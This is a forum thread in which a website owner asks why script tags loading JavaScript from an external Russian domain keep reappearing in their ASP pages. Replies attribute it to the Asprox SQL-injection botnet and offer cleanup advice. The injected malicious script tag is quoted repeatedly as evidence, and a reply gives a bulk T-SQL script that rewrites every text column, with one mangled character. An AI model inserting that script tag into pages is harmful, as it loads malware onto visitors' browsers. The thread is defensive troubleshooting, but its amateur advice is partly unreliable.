Sir
I have created one website When i hosted in server automatically adds malware,
when viewing source code following lines are automatically added

<script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script>

How to get out of this malware line from my website.If i remove those lines and upload also again those line are added automatically how to solve this problem ?? how this line are added automatically ??

Kindly help on above issue

Ask your server host to change that (unlikely) or get a new one. That's the only way, probably.

Yeah, report this to your host. If they want your business, they'll get it fixed. Else, start shopping for another host. Meanwhile, backup your site and make sure that none of the mess gets carried over.

What you using PHP/ASP/or just simple HTML? Was this JavaScript added to your records in database or just to your pages?

What you using PHP/ASP/or just simple HTML? Was this JavaScript added to your records in database or just to your pages?

We are using HTML and ASP, these lines are add in web page not in DB.

Sounds like XSS

Yes, one of the possible ways...

What is your host? Also, are you uploading the files directly, but it's still getting put in. Or are you, say, putting the text into a built-in text editor there, and then it's put in?

The host is adding them to display advertising. That's how you get free web hosting.

The host is adding them to display advertising. That's how you get free web hosting.

Not in this case, this know problem with some guys injecting JavaScript either into database, or part of web page usually through feed. If you actually care to copy & paste link to the site into your browser and try to access it, you get warning from google that site contains nasties...

Report it to the ISP administrator.

If the ISP won't or can't stop it, change ISP services.

(<script src=http://www.uhwc.ru/js.js></script>)

Hi,
I have had the same problem and was even tagged by Google.

The only way to do it is open your entire web site (I mean all of the files) in whatever software you use, do a search and replace. Change all of your passwords (Server, database, email, etc ...).

Mine has not come back since.

My problem started around Mid August 2008 ... Is Godaddy you hosting company by any chance?

You have a form on your website that has been exploited. It's part of a very big botnet that automatically finds vunribiltys for asp and injects source into one of your fields. Fix the problem with correct error checking and then edit your database and remove the javascript links.

If you want to find out more infomation about this botnet it's been given the alias asprox.

I am looking into it right now. I thought my problem was over with. This is scary. I have had inconsistent behavior from MySQL and your input might help me pint point the issue. Thank you.

Good luck, if you get stuck let me know and i will help further.

Hi Omol,

Since you asked ... I have been looking into my db (not very good at it though) ... what exactly am I looking for? In the web pages, it was easy to find the intrusive url and delete. What do I search for? I tried asprox, ect ... nothing found.

Thank you.

Rachel

Yes, MySQL. I looked for js.js. in db, not there.

I did remove js.js from the website pages a while back. I checked again, it has not come back.

Something is making my database inconsistent ... Users able to register a new listing one minute but not the other (while the database is still taking their info but not publishing it back to the site).

Sorry i should not edit posts.

Heres the fix. Replace infected_table with the table name that is infected on your site.

use <infected_table>
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update ['+@T+'] set ['+@C+'] = left(
convert(varchar(8000), ['+@C+']),
len(convert(varchar(8000), ['+@C+'])) - 6 –
patindex(''%tpircs<%'',
reverse(convert(varchar(8000), ['+@C+'])))
)
where ['+@C+'] like ''%<script%</script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

If you need to know more, or want more infomation have a look at.

http://www.networkcloaking.com/ASPROX_Toolkit.pdf

Thank you very much. you are great.

One thing, your going to have to clean up your code and get some validation in place etc. Again if you need help with this let me know.

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.